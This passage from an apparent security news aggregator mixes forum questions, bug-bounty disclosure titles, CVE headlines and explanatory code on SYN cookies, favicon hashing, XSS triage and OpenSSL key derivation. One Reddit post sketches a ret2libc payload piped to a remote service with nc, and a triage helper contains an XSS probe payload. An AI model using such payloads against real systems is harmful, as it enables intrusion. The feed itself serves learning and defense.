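    h = _keyed_hash(t, client_isn, counter) & ((1 << COOKIE_BITS) - 1)
    body = (h & ~0x3) | mss_idx
    return (((counter & 0xFF) << COOKIE_BITS) | body) & MASK32


def check_syn_cookie(t: FourTuple, client_isn: int, ack_num: int, now_counter: int) -> Optional[int]:
    """Validate the ACK of a handshake the server kept no state for.

    Returns the MSS to use on success, None if the cookie is forged, replayed or stale.
    """
    cookie = (ack_num - 1) & MASK32          # the client acknowledges our ISN + 1
    counter = cookie >> COOKIE_BITS
    if ((now_counter - counter) & 0xFF) > COUNTER_WINDOW:
        return None                          # too old: the attacker cannot replay forever
    mss_idx = cookie & 0x3
    expected = make_syn_cookie(t, client_isn, MSS_TABLE[mss_idx], counter)
    if not hmac.compare_digest(expected.to_bytes(4, "big"), cookie.to_bytes(4, "big")):
        return None                          # 4-tuple, client ISN or secret does not match
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    # Constructed documentation-range addresses.
    t = FourTuple("198.51.100.7", 40000, "203.0.113.5", 443)
    isn = make_syn_cookie(t, client_isn=1000, mss=1460, counter=10)
    print(f"SYN-ACK seq: {isn:#010x}")
    print("valid ACK  ->", check_syn_cookie(t, 1000, (isn + 1) & MASK32, now_counter=11))
    print("forged ACK ->", check_syn_cookie(t, 1000, (isn + 2) & MASK32, now_counter=11))
```

    The server-side cost of a spoofed SYN is now one HMAC and one outgoing SYN-ACK, not a queue slot, which is why spoofing does not help the attacker against a cookie-protected listener. The price is that anything not encoded in the cookie (window scaling, SACK permission) is forgotten, so stacks normally keep the ordinary SYN queue and only fall back to cookies once it overflows.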
    What should I use to share a secret with someone at another company (client)?
    In this case I can't have physical access to the person. submitted by /u/that_random_bear
    Guide for how to design an account system?
    My company is overhauling its customer account system for our website, moving from simple username and password to having some form of 2FA. Now’s also a good time for us to go through all of our policies, such as the process for password reset, what to do if a customer no longer has access to their email, what to do if they no longer have access to their second factor, if their phone number changed and they forgot to update it… lots of little questions that go into having a secure account system. Is there a book or long guide with current industry best practices? Thanks. submitted by /u/tvtb

    SecWiki News 2022-03-20 Review
    Mining usable Fastjson gadgets with abstract syntax trees, by ourren; Attacking Kubernetes via gateway-api, by ourren. For more of the latest articles, visit SecWiki

    Creating a reverse C2 channel using PowerShell, C# and Python
    https://www.youtube.com/watch?v=Yoj0bQkIRqU submitted by /u/luzunov

    Courtesy of Republic of Bulgaria! - Part Three
    The nukes are coming! The nukes are coming! Enjoy!

    Dirty Pipe Vulnerability in Linux
    Article URL: https://dietpi.com/blog/?p=1379 Comments URL: https://news.ycombinator.com/item?id=30741595

    MyEnv := ZAP+Proxify+Burp
    What tools do you use for security testing? I use ZAP as my main tool and Burp Suite as a secondary scanner. In my last post of 2021 ("The Story of My Main Weapon") I mentioned Proxify. Today I want to talk about the new analysis environment I am building around Proxify, why I am doing it, and what more I hope to get out of it. Why: First, let me explain why I want to change my analysis environment. I have long known that the data produced during analysis needs to be reusable. I thought about this in many ways, but all I ever came up with were large, complicated designs, never one I could actually build and use well.

    Bulk Extractor showing Explicit Websites
    Howdy all. Okay, so whilst I was going through my client's data I found some explicit websites in the domain_histogram result from Bulk Extractor! Now, the thing that has me awake is that the same link was present on all hosts! So I downloaded a fresh ISO image from the official Windows link, made a virtual machine and captured its RAM. Found the same links xD. I've no idea what is happening or how. Any leads anyone can help me with? submitted by /u/GloryHunter9

    RXSS
    SecurityScorecard disclosed a bug submitted by ww1: https://hackerone.com/reports/1418413
    Insecure crossdomain.xml on https://vdc.mtnonline.com/
    MTN Group disclosed a bug submitted by xlife: https://hackerone.com/reports/838817
    Exposed .bash_history at http://21days2017.mtncameroon.net/.bash_history
    MTN Group disclosed a bug submitted by xlife: https://hackerone.com/reports/801437

    Frelatage: A fuzzing library to find vulnerabilities and bugs in Python applications
    submitted by /u/FrenchFuzzer

    Ukraine — Situation update as of 20 March
    The last 24 hours
    OSINT — L’espion
    This short article presents my solution to the CTF challenge titled “L’espion”, an open source intelligence (OSINT) challenge available on…
    Searchlight — IMINT
    Hacktoria Walkthrough — Hacktoria: Geolocation 27
    This time I'm going to write another writeup about geolocation:
    Berlin's ugliest business centres: where the Verfassungsschutz rents offices
    The Bundesamt für Verfassungsschutz (Federal Office for the Protection of the Constitution) operates cover agencies in Germany to make its offices and activities as hard to trace as possible…

    RAM Memory Analysis volatility
    Hi, I want to perform an analysis of the RAM of an Android phone using Volatility, and for this I have a .bin file, a "System.map" and a "module.dwarf". The tool I have to use is Volatility and I am not able to set the profile using the previous files to perform the analysis. Can someone please help me? Thanks submitted by /u/Zealousideal_Ad601
    Falcon Neo - Imaging
    Can someone let me know how Falcon Neo reads/detects the connected source drive? submitted by /u/Pepperknowsitall

    Parent PID Spoofing (Mitre:T1134)
    Introduction: Parent PID spoofing is an access token manipulation technique that may help an attacker evade defenses such as heuristic detection by spoofing… (Hacking Articles)

    Findsecret
    Hello friends. Today I will introduce a tool I developed using the Go programming language.
    Echidna Bug Bounty Program
    Earn rewards of up to $50,000
    Metasploit
    Anatomy and structure of Metasploit; basic commands and configuration; scanning services with Metasploit; Meterpreter basics
    BugBounty: HTML Injection
    (Do you want to create your own hacking tools? Do you want to create a tool that can be undetectable by antivirus, can hack any Windows…
    Web Hacking: A drama
    Part One: An arrogant web app.

    SecWiki News 2022-03-19 Review
    No news updated today. For more of the latest articles, visit SecWiki

    Browser in the Browser
    submitted by /u/dmchell

    Where to focus further learning?
    Working in cyber I realized my knowledge is an inch deep and a mile wide when it comes to technology. I've earned my ECIH, Sec+ and recently provisionally passed my CISSP. I have only 4 years' experience and am in a security management role. I definitely feel like I have imposter syndrome at times and want to build my technical knowledge, but there is just SO much out there to learn. Where do you feel it's most important to focus attention when leading an IR/Blue Team? My overall goal is to advance in cyber/IT management by landing a director role and, more long term, CISO. Any thoughts or advice here? submitted by /u/gnomeparadox
    Find hostnames in DNS records
    I'm doing a penetration test, and I've tried brute-forcing the customer's domain to find hostnames. I'm sure there are others that exist but I can't find them. They are a fairly global company. I know they'll have users and customers all over the world requesting various apps. Is there a way to identify hostnames through public sources? I mean, is there a DNS server (like 1.1.1.1) that discloses the DNS records people have requested? Or something like this? submitted by /u/InternalCode

    Asking for help
    Hello guys, could you recommend me some learning material or a roadmap, as I want to learn exploit development: what to learn, etc. Thank you in advance. submitted by /u/Shokhjakhon23235
    Exploit dev on Windows Subsystem for Linux 2 possible?
    Hello all. I have a question for which I cannot find information on Google. I would like to learn how to write simple exploits for Linux and I wonder if I can do it using WSL2. Is this technology suitable for Linux exploit development training? Thanks submitted by /u/JunkieChunkie

    FreeBuf Morning Report | Phishing software exploits the invasion of Ukraine to obtain cryptocurrency; Europe warns of aircraft GPS disruptions linked to the Russian invasion
    CISA and the FBI said today that they are aware of "possible threats" to satellite communication networks in the US and around the world.

    CVE-2022-27226: CSRF to RCE in iRZ Mobile Routers through 2022-03-16
    Article URL: https://johnjhacking.com/blog/cve-2022-27226/ Comments URL: https://news.ycombinator.com/item?id=30730055

    LOLBINed — CyberGhost VPN (PeLauncher.exe/Dashboard.exe)
    Ghostbusters

    How to find phishing websites with favicon hashes
    Bug bounty hunters use the favicon's hash to find vulnerable websites. Different versions of software sometimes have different favicons…
    Software: Uncover
    In an article published on blackhatethicalhacking.com we’re introduced to the nifty tool Uncover.
    Ukraine — Situation update as of 19 March
    The last 24 hours
    Walkthrough — Hacktoria: Geolocation 24
    This morning I decided to do a geolocation exercise in Hacktoria.
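
    The favicon-hash technique in the item above (finding other hosts that serve the same icon, phishing clones included, by searching an index such as Shodan's http.favicon.hash filter) only works if the hash is computed exactly as the index computes it: the icon bytes are base64-encoded with a newline every 76 characters and that text, newlines included, goes through 32-bit MurmurHash3, reported as a signed integer. The block below is an added, self-contained implementation, not code from the original article and using no third-party module; the favicon bytes are a constructed stand-in, and the hash is checked against published MurmurHash3 test vectors.

```python
import base64
import struct

MASK32 = 0xFFFFFFFF


def _rotl32(x: int, r: int) -> int:
    return ((x << r) | (x >> (32 - r))) & MASK32


def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32 (the function behind mmh3.hash), returned unsigned."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    h = seed & MASK32
    nblocks = len(data) // 4
    # Body: consume little-endian 32-bit blocks.
    for (k,) in struct.iter_unpack("<I", data[: nblocks * 4]):
        k = (k * c1) & MASK32
        k = _rotl32(k, 15)
        k = (k * c2) & MASK32
        h ^= k
        h = _rotl32(h, 13)
        h = (h * 5 + 0xE6546B64) & MASK32
    # Tail: the remaining 1-3 bytes, assembled little-endian.
    tail = data[nblocks * 4:]
    k = 0
    for i, b in enumerate(tail):
        k ^= b << (8 * i)
    if tail:
        k = (k * c1) & MASK32
        k = _rotl32(k, 15)
        k = (k * c2) & MASK32
        h ^= k
    # Finalization mix.
    h ^= len(data)
    h ^= h >> 16
    h = (h * 0x85EBCA6B) & MASK32
    h ^= h >> 13
    h = (h * 0xC2B2AE35) & MASK32
    h ^= h >> 16
    return h


def to_signed32(n: int) -> int:
    """mmh3 and Shodan report the hash as a signed 32-bit integer."""
    return n - (1 << 32) if n & 0x80000000 else n


def favicon_hash(favicon: bytes) -> int:
    """Favicon hash as used by Shodan's http.favicon.hash filter.

    The icon bytes are base64-encoded with a newline every 76 characters plus a
    trailing newline (what codecs.encode(data, "base64") produces, which
    base64.encodebytes reproduces), and that text is what gets hashed.
    """
    encoded = base64.encodebytes(favicon)
    return to_signed32(murmur3_32(encoded))


# Constructed stand-in for favicon.ico: an ICO-like header followed by zero bytes.
# It is not a real icon; replace it with open("favicon.ico", "rb").read().
FAVICON_SAMPLE = b"\x00\x00\x01\x00\x01\x00\x10\x10\x00\x00\x01\x00\x20\x00" + b"\x00" * 50

if __name__ == "__main__":
    print("http.favicon.hash:", favicon_hash(FAVICON_SAMPLE))
```

    Feed it the bytes fetched from /favicon.ico (or the path referenced by the page's link rel="icon") and search the resulting integer; because the wrapping newlines are part of the hashed input, hashing the raw bytes or an unwrapped base64 string gives a value the index will never match.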

    PIN BYPASS
    Yoti disclosed a bug submitted by ww1: https://hackerone.com/reports/1257586 - Bounty: $1000
    Military name,email,phone,address,certdata Disclosure
    U.S. Dept Of Defense disclosed a bug submitted by unknownsh: https://hackerone.com/reports/1490133
    CVE-2020-3452 on https:///
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1455257
    Arbitrary File Deletion (CVE-2020-3187) on
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1455266
    CSRF - Modify User Settings with one click - Account TakeOver
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799895
    Reflected XSS - in Email Input
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799839
    IDOR - Delete Users Saved Projects
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/800608
    CSRF - Delete Account (Urgent)
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799855
    CVE-2021-42567 - Apereo CAS Reflected XSS on https://
    U.S. Dept Of Defense disclosed a bug submitted by 3th1c_yuk1: https://hackerone.com/reports/1446236
    XSS because of Akamai ARL misconfiguration on
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1305477
    RCE .api/nr/report/{id}/download
    Mail.ru disclosed a bug submitted by mkhazov: https://hackerone.com/reports/1348154 - Bounty: $1000
    XSS Stored on https://seedr.ru
    Mail.ru disclosed a bug submitted by fallenskill: https://hackerone.com/reports/1350671
    OS command injection on seedr.ru
    Mail.ru disclosed a bug submitted by fallenskill: https://hackerone.com/reports/1360208 - Bounty: $1000
    SSRF + RCE fastCGI POST /api/nr/video
    Mail.ru disclosed a bug submitted by mkhazov: https://hackerone.com/reports/1354335 - Bounty: $1000

    Some ODs with various fonts
    http://www.hixie.ch/resources/ https://mirrors.cloud.tencent.com/adobe-fonts/ http://www.paulvlachou.com/fonts/ http://somospixel.com/fonts/ submitted by /u/subwaytech
    Is the Mega Discord gone? If so, does anyone have a link? Also, I'm sorry if this is the wrong subreddit for this, but I thought this is where I found it initially. Thanks
    submitted by /u/taramj13
    How to deploy API to Netlify
    The API I have works fine locally, but it keeps failing when I try to deploy to Netlify. I keep getting this error:
    node:internal/url:552
    5:51:22 PM: throw new ERR_INVALID_URL(input);
    5:51:22 PM: ^
    5:51:22 PM: TypeError [ERR_INVALID_URL]: Invalid URL
    5:51:22 PM: at new NodeError (node:internal/errors:371:5)
    5:51:22 PM: at onParseError (node:internal/url:552:9)
    5:51:22 PM: at new URL (node:internal/url:628:5)
    5:51:22 PM: at Function.parseURL (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:113:76)
    5:51:22 PM: at Commander._RedisClient_initiateOptions (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:294:36)
    5:51:22 PM: at new RedisClient (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:77:148)
    5:51:22 PM: at new Com…

    Insecure Direct Object Reference Exposes all users of Microsoft Azure Independent Software Vendors
    The first bounty took a few challenging months, the second only a few days.
    Good day, everyone! I spent nearly three hours looking for this bug, but it took me three months to uncover the bug that brought me my…
    How to Create Your Own Nuclei Template: Part 1 (Indonesian Version)
    Let me introduce myself: my name is Muhammad Daffa, a student at a university in Surabaya. I am currently working part time as…
    Adobe bug bounty using IDOR, confidential data leaks
    I hacked Adobe using IDOR, and got this
    WardenSwap x Immunefi: Launching a Bug Bounty Program with a reward of up to $100,000 USD.
    WardenSwap aims to give rewards to white hats who uncover bugs in our smart contracts and/or vulnerabilities in our protocols by working…
    subNum
    Crawl all URLs and check for subdomain takeover vulnerability.
    I got Premium Hacking and Bug Bounty Courses *FREE*
    Yes, Yes, Yessssss! I got many, I think more than 1000+ premium ethical hacking and bug bounty courses FREE. Only you have to spend your…
    Bypass confirmation to add payment method.

    Scans for Movable Type Vulnerability (CVE-2021-20837)
    Article URL: https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454 Comments URL: https://news.ycombinator.com/item?id=30725737
    Computer scientist identifies JavaScript vulnerability in thousands of websites
    Article URL: https://hub.jhu.edu/2022/03/14/computer-scientist-identifies-javascript-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30725274

    XSS Weakness (JSON XSS) to Valid XSS
    Today I want to talk about how to turn an XSS weakness into a triggerable XSS. It is not a new technique; it is a trick everyone has used for a long time, but I realised I had never written it up on its own, so I am taking the opportunity to put it in writing. Let's begin 🔥 XSS Weakness: during XSS testing we sometimes find a reflection in a response whose Content-Type is JSON. ZAP and Burp Suite flag this through their active/passive scans. Alert (rule): ZAP "Cross Site Scripting Weakness (Reflected in JSON Response)"; Burp Suite "Cross-site scripting (reflected) / Info". Naturally the tools' detection is informational only, and unless there is some bypass pattern these findings are usually discarded.
    [Cullinan #29] Update 3 Pages
    This is Cullinan log #29. There were updates to DOM Clobbering, ZAP and Command Injection. Update DOM Clobbering (add ZAP script); Update ZAP (update build snippet); Update Command Injection (add bypass technique with OOB)
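
    The JSON-reflection case in the XSS Weakness item above comes down to one question: is the reflected input ever parsed as HTML? The block below is an added triage helper, not code from the original post, run over constructed sample responses. It separates an unencoded reflection in a text/html body (a real XSS) from the same reflection in an application/json body (a weakness, since the browser will not execute it unless the attacker can change the content type), treats an HTML- or JSON-escaped reflection as encoded, and notes when a non-HTML response lacks X-Content-Type-Options: nosniff, the header that forbids content sniffing and is therefore worth checking before discarding the finding.

```python
import html
import json
from typing import Dict, Iterator, Tuple

HTML_TYPES = {"text/html", "application/xhtml+xml"}


def _variants(payload: str) -> Iterator[Tuple[str, str]]:
    """Forms a reflected payload commonly takes: raw, HTML-escaped, JSON-escaped (\\u003c style)."""
    yield "raw", payload
    yield "html-escaped", html.escape(payload, quote=True)
    yield "json-escaped", json.dumps(payload)[1:-1].replace("<", "\\u003c").replace(">", "\\u003e")


def classify_reflection(headers: Dict[str, str], body: str, payload: str) -> str:
    """Triage a reflected-input finding.

    Returns one of:
      "not-reflected"       the payload is not in the response in any recognised form
      "xss"                 reflected unencoded into an HTML response: exploitable
      "encoded"             reflected, but with < > " escaped for the response's format
      "xss-weakness"        unencoded in a non-HTML (e.g. JSON) response that carries nosniff
      "sniffable-weakness"  unencoded in a non-HTML response without X-Content-Type-Options
    """
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    nosniff = h.get("x-content-type-options", "").strip().lower() == "nosniff"

    found = next((kind for kind, text in _variants(payload) if text in body), None)
    if found is None:
        return "not-reflected"
    if ctype in HTML_TYPES:
        return "xss" if found == "raw" else "encoded"
    if found != "raw":
        return "encoded"
    return "xss-weakness" if nosniff else "sniffable-weakness"


# Constructed sample responses; the payload is a typical scanner probe.
PAYLOAD = "<svg onload=alert(1)>"
SAMPLES = {
    "json-api": ({"Content-Type": "application/json; charset=utf-8", "X-Content-Type-Options": "nosniff"},
                 '{"query":"<svg onload=alert(1)>","results":[]}'),
    "json-no-nosniff": ({"Content-Type": "application/json"}, '{"q":"<svg onload=alert(1)>"}'),
    "json-escaped": ({"Content-Type": "application/json"}, '{"q":"\\u003csvg onload=alert(1)\\u003e"}'),
    "html-page": ({"Content-Type": "text/html; charset=utf-8"}, "<p>You searched for <svg onload=alert(1)></p>"),
    "html-encoded": ({"Content-Type": "text/html"}, "<p>You searched for &lt;svg onload=alert(1)&gt;</p>"),
}


def triage_all() -> Dict[str, str]:
    return {name: classify_reflection(hdrs, body, PAYLOAD) for name, (hdrs, body) in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in triage_all().items():
        print(f"{name:16} -> {verdict}")
```

    The two weakness verdicts are what ZAP's "Reflected in JSON Response" rule and Burp's Info-level finding correspond to; they become a valid XSS only if some other behaviour lets the same reflection be served as HTML, which is the part the tools cannot decide for you.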

    SecWiki News 2022-03-18 Review
    A brief discussion of data security, by ourren; Implementing DevSecOps for microservice-based applications with a service mesh, by ourren; The little secret of how merely browsing a web page can leak your phone number, by ourren; Attack surface management (ASM) technology explained and implemented, by ourren; ATT&CK red team evaluation: penetration notes on three practice ranges, by ourren; B1txor20, a Linux backdoor using DNS tunneling, by ourren; ApolloScanner: an automated cruising scan framework, by ourren; A first look at the Java CommonsCollections exploit chain, by ourren; 2021 Xihu Lunjian IoT RW write-up, by ourren. For more of the latest articles, visit SecWiki

    0d1n - Tool for automating customized attacks against web applications. Fully made in C language with pthreads, it has fast performance.
    submitted by /u/CoolerVoid
    0d1n
    Tool for automating customized attacks against web applications. Entirely made in C language with threads, it has fast performance. https://github.com/CoolerVoid/0d1n submitted by /u/CoolerVoid

    Pentesting: The Relevance, Top 10 Tools, And More

    Brooklyn 99 CTF - Process and Report
    Lab Goals. This one is a standard “capture the flag” style box with no other goals, so you’re on your own to figure out the methodologies.

    SolarWinds warns Web Help Desk users of attacks
    Recently, software company SolarWinds warned users that running unpatched Web Help Desk software may expose them to cyberattacks.
    FreeBuf customer-side group discussion | Talking about enterprise SOC platform construction
    How to sort out the relationships and organisation between SOC-related services and products, and how they should work together for maximum efficiency?
    Digital Finance Anti-Fraud Technology Application Analysis Report (2021)
    Against the backdrop of a new round of technological revolution and industrial transformation, the wave of digitalisation in finance is booming; big data, artificial intelligence, cloud computing and other new technologies are deeply integrating with financial business, and digital transformation has become the financial industry's common choice for improving service quality and competitiveness.
    FreeBuf Weekly | The 3.15 gala sets up its first security lab to address information security; Android banking trojan Escobar lies in wait
    This year's 3.15 gala set up an information security laboratory for the first time and tested two products, drawing wide attention.
    Security Lecture Hall | Tan Xiaosheng: Security as a Service, new cybersecurity opportunities in the Internet of Everything
    Where does the road lead for the commercialisation of cybersecurity?
    ASUS warns of Cyclops Blink malware attacks targeting routers
    Cyclops Blink can establish a persistent connection to the attacker from the target device, enabling remote access to the compromised network.
    Anonymous hacker collective declares it will continue to support Ukraine against Russia
    The Anonymous hacker collective and its affiliates declared that they will continue cyberattacks against Russian government and private organisations.
    Microsoft to retire Internet Explorer entirely in June
    Microsoft today reminded Windows users that it will retire Internet Explorer from some Windows 10 versions in June this year.

    Decrypt using OpenSSL
    Hi there people, I'm trying to decrypt a salted des3 file using openssl:
    openssl des3 -d -salt -pbkdf2 -in file.des3 -out file.txt -k password
    But it shows me the next error:
    bad decrypt
    140292356945280:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt
    Can you guys figure out what is wrong with the command, or am I using something already deprecated? Thank you all submitted by /u/TaryG19
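
    In the command above, -pbkdf2 selects how the key and IV are derived from the password, not which cipher is used, and a derivation mismatch between encryption and decryption is one common cause of `bad decrypt` with `openssl enc`: without -pbkdf2, OpenSSL derives key and IV with its legacy EVP_BytesToKey routine (one round of SHA-256 over password||salt in OpenSSL 1.1.0 and later, MD5 in older releases); with -pbkdf2 it uses PBKDF2-HMAC-SHA256 at 10,000 iterations by default. Both read the 8-byte salt from the `Salted__` header at the start of the file. The block below is an added example, not part of the poster's question: it parses that header and derives the des-ede3-cbc (the `des3` alias) key and IV both ways from a constructed file and password so the two can be compared against what `openssl enc -P` prints; the cipher step itself is left to openssl.

```python
import hashlib
from typing import Tuple

MAGIC = b"Salted__"
KEY_LEN, IV_LEN = 24, 8      # des-ede3-cbc ("des3"): 24-byte key, 8-byte IV
PBKDF2_ITERATIONS = 10000    # openssl enc -pbkdf2 default


def parse_salted_header(blob: bytes) -> Tuple[bytes, bytes]:
    """Split an `openssl enc -salt` output file into (salt, ciphertext)."""
    if len(blob) < 16 or blob[:8] != MAGIC:
        raise ValueError("not an OpenSSL Salted__ container")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, digest: str = "sha256",
                     count: int = 1) -> Tuple[bytes, bytes]:
    """Legacy derivation used when -pbkdf2 is absent.

    D_1 = H(password || salt), D_i = H(D_{i-1} || password || salt), concatenated until
    key + IV bytes are available. OpenSSL >= 1.1.0 defaults to SHA-256, older releases to MD5.
    """
    out, prev = b"", b""
    while len(out) < KEY_LEN + IV_LEN:
        d = prev + password + salt
        for _ in range(count):
            d = hashlib.new(digest, d).digest()
        out += d
        prev = d
    return out[:KEY_LEN], out[KEY_LEN:KEY_LEN + IV_LEN]


def pbkdf2_key_iv(password: bytes, salt: bytes, iterations: int = PBKDF2_ITERATIONS,
                  digest: str = "sha256") -> Tuple[bytes, bytes]:
    """Derivation used with -pbkdf2: key and IV are cut from a single PBKDF2 output."""
    dk = hashlib.pbkdf2_hmac(digest, password, salt, iterations, KEY_LEN + IV_LEN)
    return dk[:KEY_LEN], dk[KEY_LEN:]


def derive_both(blob: bytes, password: bytes) -> dict:
    """Key/IV pairs both schemes would produce for the salt stored in this file."""
    salt, _ciphertext = parse_salted_header(blob)
    return {"legacy": evp_bytes_to_key(password, salt), "pbkdf2": pbkdf2_key_iv(password, salt)}


# Constructed sample: Salted__ header, an 8-byte salt, 16 bytes of placeholder ciphertext.
SAMPLE_FILE = MAGIC + bytes(range(8)) + b"\x00" * 16
SAMPLE_PASSWORD = b"password"

if __name__ == "__main__":
    for name, (key, iv) in derive_both(SAMPLE_FILE, SAMPLE_PASSWORD).items():
        print(f"{name:7} key={key.hex()} iv={iv.hex()}")
```

    Compare the printed values with `openssl des3 -P -salt -S <salt hex> -k <password>` with and without -pbkdf2 (and with `-md md5` for files produced by OpenSSL 1.0.x): whichever pair matches the encrypting side is the derivation the decrypt command has to use.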

    Zones and conduits in accordance with IEC 62443 standards
    There are several high-level reference models proposed by different sources and industry leaders to assist in the initial definition and separation of zones and conduits, such as: the DuPont Reference Architecture, the Tofino Security high-level model, the Honeywell Reference Architecture, the Rockwell Reference Architecture, and the Siemens Reference Architecture. How is each model being used in industrial automation and control systems to define and separate zones and conduits in accordance with IEC 62443 standards? submitted by /u/Economy-Function-337
    Finding ret2libc's system() address on a remote machine. I need help utilizing extra information.
    I have a similar problem as this StackExchange question. I have the following scenario: a vulnerable program is running on a server and can be accessed using netcat. I have a copy of that program locally and I can exploit it locally using ROP:
    ./vuln garbage + &system() + &exit() + &"/bin/sh"
    Now I want to exploit it remotely, so technically I would be executing this command:
    echo -e "garbage + &system() + &exit() + &/bin/sh" | nc host port
    My problem is: I do not know what &system() is on the remote machine. Is there any way to get it without brute force, i.e. trying all memory addresses from 0x00000000 -> 0xFFFFFFFF? BUT, in my case, there is some extra information given. Every time, the program also prints the buf address like this:
    Enter a string: Here's a clue! The address of buf is 0xffffdc0c
    But I don't know how to utilize this piece of information. How do I use this? submitted by /u/reddotname
    Kaspersky alternatives?
    Well, with the warning that the BSI put out alerting users that Kaspersky could possibly be compromised (either now or in the future), my company is looking for alternatives for their antivirus software. We'll probably begin the evaluation process next week, but I wanted to get a head start and hear some of the netsec community's opinions on alternatives to Kaspersky. We are in the process of becoming ISO 27001 compliant, so every procedure is under extreme scrutiny and requires extensive documentation. Some current candidates are Sophos, Bitdefender and Trend Micro. What are your thoughts on ease of deployment, cost, security and privacy policies of the aforementioned alternatives? Any other suggestions for alternatives? Any comments or suggestions are greatly appreciated, thanks. submitted by /u/Goldsound


    Random number generator enhancements for Linux 5.17 and 5.18
    submitted by /u/zx2c4
    Post-auth RCE based on malicious Lua plugin script upload in SCADA controllers located in Russia
    submitted by /u/bertinjoseb
    Detecting Headless Chrome: Spotlight on Puppeteer-Extra-Plugin-Stealth
    submitted by /u/threat_researcher
    Unraveling Assets from Android Apps at Scale - An OSINT API allows you to scan over half a million Android apps for subdomains, S3 buckets, URL Params and more.
    submitted by /u/alt-glitch
    Mitigating CVE-2022-0811: Arbitrary code execution affecting CRI-O
    submitted by /u/MiguelHzBz

    Is this networking knowledge enough?
    Does learning how to manage a network, network simulation with GNS3, and installing a physical network have to do with security? I can't deal with GNS3, but I can use Packet Tracer. But what I am asking is: is it enough to learn about the protocols, routing, IP addressing and the TCP/IP stack if I want to work in penetration testing? Or should I use a network simulation and dig deeper? I feel that practicing through HTB and THM teaches me more now that I have learned the fundamentals. And when I am stuck with something like Active Directory I just go into a room in THM or read about it. submitted by /u/Ramseesthe4th
    HTTP 'PUT' method is enabled on Printer's Web Server
    Hey everyone, I'm a new infosec analyst and I've been tasked to run a vulnerability scan against our company's printers. Our scanner found that the HTTP 'PUT' method is enabled on several of our printers' web servers. How would I go about remediating this vulnerability if it's an HP Embedded Web Server? Right now, there is zero access control configured to log into the web server. Would enabling that help fix the vulnerability? I don't see anywhere in the server settings to disable the method. Thanks so much! submitted by /u/Zgame200
    Advice for a security analyst interview at a bank?
    Background about me: a few years of low-level SOC, mainly just looking at alerts and logs, vuln scanning. Honestly don't really do much. About the position: not entry level; the requirements look pretty heavy. Seems to be a mix of both technical (alerts, incident response, playbooks, risk assessment, threat analysis, vulnerability, backups, pentesting, and more) and GRC stuff. The technical stuff I have familiarity with for the most part, but little practical experience. GRC/compliance stuff I have no experience with whatsoever and have no clue what to study. Do I just familiarize myself with a bunch of standards like ISO 27001? Anyone have experience interviewing or working at a bank? Looking for general tips or guidance on how to prepare for this interview. Thanks! submitted by /u/mygumsaredying
    Is a cloud provider considered to be a Data Steward or a Data Custodian?
    Help me settle a debate. Is a cloud provider considered to be a Data Steward or a Data Custodian? My vote is they are the Data Steward. A colleague insists they are the Data Custodian. Either way, they have shared responsibility, but again, I'm looking to make sure to use the correct terminology. submitted by /u/paulexander
    ELI5 Investigating a Suspicious Website
    Can someone walk me through how I would investigate a URL that’s been flagged as suspicious? A good example: omnatuor[.]com submitted by /u/annonuk2020
    OpenSSL resources?
    How did you get started on OpenSSL? I'm currently doing some CTFs and I encounter some OpenSSL questions; I don't have any idea how to study this one (done with searching on YouTube). Thank you submitted by /u/pldc_bulok
    Building a security program at a startup?
    I'm a mid-level software engineer with some security experience interviewing with early stage startups for application security engineering positions. Many of these companies are either building a security team from scratch, or have 1-2 security engineers already. I'll primarily be working with developers on doing source code reviews, tool development and automation. I'm assuming there won't be much real mentorship/guidance, so I'd like to know what are some of the first things a new security engineer at an early stage startup should do to hit the ground running. submitted by /u/cppnewb
    Bachelor Thesis Topic Ideas
    Hello everyone, I'm doing my bachelor's in computer science and I'll be writing my bachelor's thesis. Actually my professor offered a thesis topic related to implementation of access control with certificates on VPN. It's nice but requires me to be at the university, and unfortunately I can't be in the same city in the next semester. So I'm looking for more research-oriented topics related to security, preferably on the defensive side. I'd appreciate it if anyone can suggest some topics, so I can talk to my prof at the next meeting with different ideas. Thank you in advance. submitted by /u/guneysss
    Good Security dashboard Template
    Hi Security Folks, what are the security metrics you are collecting and reporting every week? Is there a good security dashboard template that I can use for my team/upper C-level manager report? submitted by /u/Calm_Scene

    LOLBINed — F-Secure Support Tool (FSDIAG)
    WHAT ARE WIRELESS NETWORK PENETRATION TECHNIQUES AND HOW IS WIRELESS NETWORK SECURITY ENSURED?
    Wi-Fi, which has the most important share among wireless communication technologies, works over certain distances by using radio waves…

    Ukraine — Situation update as of 18 March
    The last 24 hours

    Analyzing Malware with Hooks, Stomps, and Return-addresses
    submitted by /u/dmchell

    CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable
    CVE-2021-28372, a vulnerability in third-party software commonly built into many IP cameras, highlights issues in IoT supply chain security. (Unit42)

    Escaping Dirty Pipe (a.k.a. CVE-2022-0847), mostly unscathed
    Article URL: https://blog.replit.com/dirtypipe-kernel-vulnerability Comments URL: https://news.ycombinator.com/item?id=30714414
    CVE-2022-23812: node-ipc contains malicious code targeting Russia and Belarus
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-23812 Comments URL: https://news.ycombinator.com/item?id=30707728

    Indirect Command Execution: Defense Evasion (T1202)
